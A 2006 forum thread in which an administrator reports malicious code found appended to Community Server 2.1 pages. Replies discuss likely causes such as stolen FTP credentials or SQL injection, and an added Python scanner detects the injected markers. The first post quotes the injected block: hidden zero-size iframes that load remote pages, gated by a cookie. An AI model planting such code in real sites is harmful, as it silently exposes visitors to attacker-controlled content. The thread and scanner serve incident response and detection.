|
| A question about Community Server 2.1 being hacked |
 |
Fri, 1 Dec 2006 20:18:44 +0000 |
We have one of our Community Server sites running version 2.1 on which we got
the error page. After looking at what might cause this issue, we noticed that the
default page had some additional code at the bottom of the page which nobody
from our company or the client wrote or added. Now I have taken out the IP
address in the src; this is not any of our IP addresses, and we have done a search
on arin.net to find out whose IP address it is.
<!--<iframe width='0' height='0'
src='http://0.0.0.0/exchweb/aim.htm'></iframe>
<%
dim num
num=request.cookies("isview")
if num = "1" then
else
num=1
response.cookies("isview")=num
response.cookies("isview").expires=date+2
%>
<iframe width='0' height='0'
src='http://0.0.0.0/exchweb/icq.htm'></iframe>
<%
end if
%>-->
After we removed this line of code, we could then see the site, but when we went
to the blogs, forums, files or photos we again had the error page. We then looked
at these default.aspx pages and they too had this same line of code at the
bottom, and we removed the code and they started working. We also found that each
blog's folder default.aspx had the code, and we removed the code in these as
well.
Has anybody else had this, or know how this could happen?
| Re: A question about Community Server 2.1 being hacked |
 |
Fri, 1 Dec 2006 20:36:28 +0000 |
Kevin, are you saying this entire section of code was on your site pages?
-Dave
| Re: A question about Community Server 2.1 being hacked |
 |
Fri, 1 Dec 2006 20:40:40 +0000 |
What are the permissions set on your CS application files and folders? Are you
running in full trust with asp.net? Are you sure someone has not got into the
server or FTP accounts?
| Re: A question about Community Server 2.1 being hacked |
 |
Fri, 1 Dec 2006 23:10:15 +0000 |
daveburke:
Kevin, are you saying this entire section of code was on your site pages?
-Dave
Dave, yes
The Wizard: What are the permissions set on your CS application files and folders?
Are you running in full trust with asp.net? Are you sure someone has not got
into the server or FTP accounts?
Rick, Medium trust, as far as we know no one has got into the server or FTP
accounts. We have other Community Server sites running on this server; also these
have not been affected yet. We are still monitoring this server.
| Re: A question about Community Server 2.1 being hacked |
 |
Mon, 4 Dec 2006 15:01:35 +0000 |
I would suspect first that someone just got the FTP account login, and would
change that user and password for all accounts and then see if they are able to
add it back. Especially if you are running medium trust, I would think it would
be very difficult to edit all default.aspx files without server access first, or
SQL access, maybe with some sort of SQL injection.
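An added example, not part of the thread and not Community Server code: a small scanner that walks a web root and reports every page file carrying the two markers visible in the block quoted in the first post (a zero-size iframe and the "isview" cookie), so the cleanup does not depend on opening each default.aspx by hand. The function names, the extension list and the sample files are assumptions made for this illustration.

```python
import os
import re
import tempfile

# Zero-size iframe, the shape of the injected tags quoted in the first post.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b(?=[^>]*\bwidth\s*=\s*['\"]?0\b)"
    r"(?=[^>]*\bheight\s*=\s*['\"]?0\b)[^>]*>", re.IGNORECASE)
# Cookie the injected script sets so the second iframe loads once per visitor.
ISVIEW_COOKIE = re.compile(r"cookies\(\s*\"isview\"\s*\)", re.IGNORECASE)
PAGE_EXTENSIONS = (".aspx", ".ascx", ".master", ".asp", ".htm", ".html")

def scan_text(text):
    """Return sorted (line_number, reason) pairs for one file's contents."""
    hits = []
    for pattern, reason in ((HIDDEN_IFRAME, "hidden iframe"),
                            (ISVIEW_COOKIE, "isview cookie")):
        for match in pattern.finditer(text):
            hits.append((text.count("\n", 0, match.start()) + 1, reason))
    return sorted(hits)

def scan_tree(root):
    """Walk a web root; map relative path -> findings for files with hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PAGE_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report

def demo():
    """Constructed sample: one clean page and one with the appended block."""
    clean = "<html><body>Home</body></html>\n"
    appended = ("<!--<iframe width='0' height='0'\n"
                "src='http://0.0.0.0/exchweb/aim.htm'></iframe>\n"
                "<%\nnum=request.cookies(\"isview\")\n%>-->\n")
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "blogs"))
        with open(os.path.join(root, "default.aspx"), "w") as fh:
            fh.write(clean)
        with open(os.path.join(root, "blogs", "default.aspx"), "w") as fh:
            fh.write(clean + appended)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

Running `scan_tree` again after the FTP and account passwords are changed shows whether the block has been added back.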